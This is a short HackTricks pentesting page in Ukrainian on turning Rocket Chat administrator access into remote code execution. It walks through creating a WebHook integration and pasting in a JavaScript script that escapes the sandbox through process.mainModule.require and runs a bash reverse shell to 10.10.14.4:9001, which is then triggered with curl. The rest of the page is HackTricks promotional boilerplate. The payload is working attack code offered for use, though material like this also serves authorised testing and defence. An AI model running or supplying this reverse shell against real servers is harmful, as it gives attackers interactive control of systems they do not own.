Rocket Chat
Reading time: 2 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
RCE
Якщо ви адміністратор у Rocket Chat, ви можете отримати RCE.
- Перейдіть до
Integrations
і виберітьNew Integration
, а потім виберіть будь-який:Incoming WebHook
абоOutgoing WebHook
. /admin/integrations/incoming
.png)
- Згідно з документацією, обидва використовують ES2015 / ECMAScript 6 (в основному JavaScript) для обробки даних. Тож давайте отримати rev shell для javascript як:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Налаштуйте WebHook (канал і пост як ім'я користувача повинні існувати):
.png)
- Налаштуйте скрипт WebHook:
.png)
- Збережіть зміни
- Отримайте згенеровану URL-адресу WebHook:
.png)
- Викличте його за допомогою curl, і ви повинні отримати rev shell
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.